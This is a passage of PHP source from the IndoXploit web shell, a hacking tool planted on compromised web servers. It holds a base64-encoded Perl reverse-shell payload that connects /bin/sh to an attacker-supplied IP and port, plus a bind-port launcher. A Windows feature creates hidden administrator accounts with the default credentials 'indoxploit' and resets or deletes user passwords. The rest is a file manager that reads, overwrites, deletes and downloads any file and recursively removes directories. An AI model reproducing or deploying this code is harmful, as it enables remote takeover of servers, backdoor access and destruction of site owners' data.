		$port = $_POST['port_bind'];
1695
		$out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1696
		sleep(1);
1697
		echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1698
		unlink("/tmp/bp.pl");
1699
	}
1700
	$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1701
	if(isset($_POST['sub_bc'])) {
1702
		$f_bc = fopen("/tmp/bc.pl", "w");
1703
		fwrite($f_bc, base64_decode($bind_connect_p));
1704
		fclose($f_bc);
1705
1706
		$ipbc = $_POST['ip_bc'];
1707
		$port = $_POST['port_bc'];
1708
		$out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1709
		sleep(1);
1710
		echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1711
		unlink("/tmp/bc.pl");
1712
	}
1713
} elseif($_GET['do'] == 'krdp_shell') {
1714
	if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1715
		if($_POST['create']) {
1716
			$user = htmlspecialchars($_POST['user']);
1717
			$pass = htmlspecialchars($_POST['pass']);
1718
			if(preg_match("/$user/", exe("net user"))) {
1719
				echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
1720
			} else {
1721
				$add_user   = exe("net user $user $pass /add");
1722
    			$add_groups1 = exe("net localgroup Administrators $user /add");
1723
    			$add_groups2 = exe("net localgroup Administrator $user /add");
1724
    			$add_groups3 = exe("net localgroup Administrateur $user /add");
1725
    			echo "[ RDP ACCOUNT INFO ]<br>
1726
    			------------------------------<br>
1727
    			IP: <font color=lime>".$ip."</font><br>
1728
    			Username: <font color=lime>$user</font><br>
1729
    			Password: <font color=lime>$pass</font><br>
1730
    			------------------------------<br><br>
1731
    			[ STATUS ]<br>
1732
    			------------------------------<br>
1733
    			";
1734
    			if($add_user) {
1735
    				echo "[add user] -> <font color='lime'>Berhasil</font><br>";
1736
    			} else {
1737
    				echo "[add user] -> <font color='red'>Gagal</font><br>";
1738
    			}
1739
    			if($add_groups1) {
1740
        			echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
1741
    			} elseif($add_groups2) {
1742
        		    echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
1743
    			} elseif($add_groups3) { 
1744
        		    echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
1745
    			} else {
1746
    				echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1747
    			}
1748
    			echo "------------------------------<br>";
1749
			}
1750
		} elseif($_POST['s_opsi']) {
1751
			$user = htmlspecialchars($_POST['r_user']);
1752
			if($_POST['opsi'] == '1') {
1753
				$cek = exe("net user $user");
1754
				echo "Checking username <font color=lime>$user</font> ....... ";
1755
				if(preg_match("/$user/", $cek)) {
1756
					echo "[ <font color=lime>Sudah ada</font> ]<br>
1757
					------------------------------<br><br>
1758
					<pre>$cek</pre>";
1759
				} else {
1760
					echo "[ <font color=red>belum ada</font> ]";
1761
				}
1762
			} elseif($_POST['opsi'] == '2') {
1763
				$cek = exe("net user $user indoxploit");
1764
				if(preg_match("/$user/", exe("net user"))) {
1765
					echo "[change password: <font color=lime>indoxploit</font>] -> ";
1766
					if($cek) {
1767
						echo "<font color=lime>Berhasil</font>";
1768
					} else {
1769
						echo "<font color=red>Gagal</font>";
1770
					}
1771
				} else {
1772
					echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1773
				}
1774
			} elseif($_POST['opsi'] == '3') {
1775
				$cek = exe("net user $user /DELETE");
1776
				if(preg_match("/$user/", exe("net user"))) {
1777
					echo "[remove user: <font color=lime>$user</font>] -> ";
1778
					if($cek) {
1779
						echo "<font color=lime>Berhasil</font>";
1780
					} else {
1781
						echo "<font color=red>Gagal</font>";
1782
					}
1783
				} else {
1784
					echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1785
				}
1786
			} else {
1787
				//
1788
			}
1789
		} else {
1790
			echo "-- Create RDP --<br>
1791
			<form method='post'>
1792
			<input type='text' name='user' placeholder='username' value='indoxploit' required>
1793
			<input type='text' name='pass' placeholder='password' value='indoxploit' required>
1794
			<input type='submit' name='create' value='>>'>
1795
			</form>
1796
			-- Option --<br>
1797
			<form method='post'>
1798
			<input type='text' name='r_user' placeholder='username' required>
1799
			<select name='opsi'>
1800
			<option value='1'>Cek Username</option>
1801
			<option value='2'>Ubah Password</option>
1802
			<option value='3'>Hapus Username</option>
1803
			</select>
1804
			<input type='submit' name='s_opsi' value='>>'>
1805
			</form>
1806
			";
1807
		}
1808
	} else {
1809
		echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1810
	}
1811
} elseif($_GET['act'] == 'newfile') {
1812
	if($_POST['new_save_file']) {
1813
		$newfile = htmlspecialchars($_POST['newfile']);
1814
		$fopen = fopen($newfile, "a+");
1815
		if($fopen) {
1816
			$act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
1817
		} else {
1818
			$act = "<font color=red>permission denied</font>";
1819
		}
1820
	}
1821
	echo $act;
1822
	echo "<form method='post'>
1823
	Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
1824
	<input type='submit' name='new_save_file' value='Submit'>
1825
	</form>";
1826
} elseif($_GET['act'] == 'newfolder') {
1827
	if($_POST['new_save_folder']) {
1828
		$new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1829
		if(!mkdir($new_folder)) {
1830
			$act = "<font color=red>permission denied</font>";
1831
		} else {
1832
			$act = "<script>window.location='?dir=".$dir."';</script>";
1833
		}
1834
	}
1835
	echo $act;
1836
	echo "<form method='post'>
1837
	Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
1838
	<input type='submit' name='new_save_folder' value='Submit'>
1839
	</form>";
1840
} elseif($_GET['act'] == 'rename_dir') {
1841
	if($_POST['dir_rename']) {
1842
		$dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
1843
		if($dir_rename) {
1844
			$act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1845
		} else {
1846
			$act = "<font color=red>permission denied</font>";
1847
		}
1848
	echo "".$act."<br>";
1849
	}
1850
	echo "<form method='post'>
1851
	<input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
1852
	<input type='submit' name='dir_rename' value='rename'>
1853
	</form>";
1854
} elseif($_GET['act'] == 'delete_dir') {
1855
	if(is_dir($dir)) {
1856
		if(is_writable($dir)) {
1857
			@rmdir($dir);
1858
			@exe("rm -rf $dir");
1859
			@exe("rmdir /s /q $dir");
1860
			$act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1861
		} else {
1862
			$act = "<font color=red>could not remove ".basename($dir)."</font>";
1863
		}
1864
	}
1865
	echo $act;
1866
} elseif($_GET['act'] == 'view') {
1867
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1868
	echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
1869
} elseif($_GET['act'] == 'edit') {
1870
	if($_POST['save']) {
1871
		$save = file_put_contents($_GET['file'], $_POST['src']);
1872
		if($save) {
1873
			$act = "<font color=lime>Saved!</font>";
1874
		} else {
1875
			$act = "<font color=red>permission denied</font>";
1876
		}
1877
	echo "".$act."<br>";
1878
	}
1879
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1880
	echo "<form method='post'>
1881
	<textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1882
	<input type='submit' value='Save' name='save' style='width: 500px;'>
1883
	</form>";
1884
} elseif($_GET['act'] == 'rename') {
1885
	if($_POST['do_rename']) {
1886
		$rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
1887
		if($rename) {
1888
			$act = "<script>window.location='?dir=".$dir."';</script>";
1889
		} else {
1890
			$act = "<font color=red>permission denied</font>";
1891
		}
1892
	echo "".$act."<br>";
1893
	}
1894
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1895
	echo "<form method='post'>
1896
	<input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
1897
	<input type='submit' name='do_rename' value='rename'>
1898
	</form>";
1899
} elseif($_GET['act'] == 'delete') {
1900
	$delete = unlink($_GET['file']);
1901
	if($delete) {
1902
		$act = "<script>window.location='?dir=".$dir."';</script>";
1903
	} else {
1904
		$act = "<font color=red>permission denied</font>";
1905
	}
1906
	echo $act;
1907
} else {
1908
	if(is_dir($dir) === true) {
1909
		if(!is_readable($dir)) {
1910
			echo "<font color=red>can't open directory. ( not readable )</font>";
1911
		} else {
1912
			echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
1913
			<tr>
1914
			<th class="th_home"><center>Name</center></th>
1915
			<th class="th_home"><center>Type</center></th>
1916
			<th class="th_home"><center>Size</center></th>
1917
			<th class="th_home"><center>Last Modified</center></th>
1918
			<th class="th_home"><center>Owner/Group</center></th>
1919
			<th class="th_home"><center>Permission</center></th>
1920
			<th class="th_home"><center>Action</center></th>
1921
			</tr>';
1922
			$scandir = scandir($dir);
1923
			foreach($scandir as $dirx) {
1924
				$dtype = filetype("$dir/$dirx");
1925
				$dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
1926
				if(function_exists('posix_getpwuid')) {
1927
					$downer = @posix_getpwuid(fileowner("$dir/$dirx"));
1928
					$downer = $downer['name'];
1929
				} else {
1930
					//$downer = $uid;
1931
					$downer = fileowner("$dir/$dirx");
1932
				}
1933
				if(function_exists('posix_getgrgid')) {
1934
					$dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
1935
					$dgrp = $dgrp['name'];
1936
				} else {
1937
					$dgrp = filegroup("$dir/$dirx");
1938
				}
1939
 				if(!is_dir("$dir/$dirx")) continue;
1940
 				if($dirx === '..') {
1941
 					$href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
1942
 				} elseif($dirx === '.') {
1943
 					$href = "<a href='?dir=$dir'>$dirx</a>";
1944
 				} else {
1945
 					$href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
1946
 				}
1947
 				if($dirx === '.' || $dirx === '..') {
1948
 					$act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
1949
 					} else {
1950
 					$act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
1951
 				}
1952
 				echo "<tr>";
1953
 				echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
1954
				echo "<td class='td_home'><center>$dtype</center></td>";
1955
				echo "<td class='td_home'><center>-</center></th></td>";
1956
				echo "<td class='td_home'><center>$dtime</center></td>";
1957
				echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
1958
				echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
1959
				echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
1960
				echo "</tr>";
1961
			}
1962
		}
1963
	} else {
1964
		echo "<font color=red>can't open directory.</font>";
1965
	}
1966
		foreach($scandir as $file) {
1967
			$ftype = filetype("$dir/$file");
1968
			$ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
1969
			$size = filesize("$dir/$file")/1024;
1970
			$size = round($size,3);
1971
			if(function_exists('posix_getpwuid')) {
1972
				$fowner = @posix_getpwuid(fileowner("$dir/$file"));
1973
				$fowner = $fowner['name'];
1974
			} else {
1975
				//$downer = $uid;
1976
				$fowner = fileowner("$dir/$file");
1977
			}
1978
			if(function_exists('posix_getgrgid')) {
1979
				$fgrp = @posix_getgrgid(filegroup("$dir/$file"));
1980
				$fgrp = $fgrp['name'];
1981
			} else {
1982
				$fgrp = filegroup("$dir/$file");
1983
			}
1984
			if($size > 1024) {
1985
				$size = round($size/1024,2). 'MB';
1986
			} else {
1987
				$size = $size. 'KB';
1988
			}
1989
			if(!is_file("$dir/$file")) continue;
1990
			echo "<tr>";
1991
			echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
1992
			echo "<td class='td_home'><center>$ftype</center></td>";
1993
			echo "<td class='td_home'><center>$size</center></td>";
1994
			echo "<td class='td_home'><center>$ftime</center></td>";
1995
			echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
1996
			echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
1997
			echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
1998
			echo "</tr>";
1999
		}
2000
		echo "</table>";
2001
		if(!is_readable($dir)) {
2002
			//
2003
		} else {
2004
			echo "<hr>";
2005
		}
2006
	echo "<center>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a></center>";
2007
}
2008
?>
2009
</html>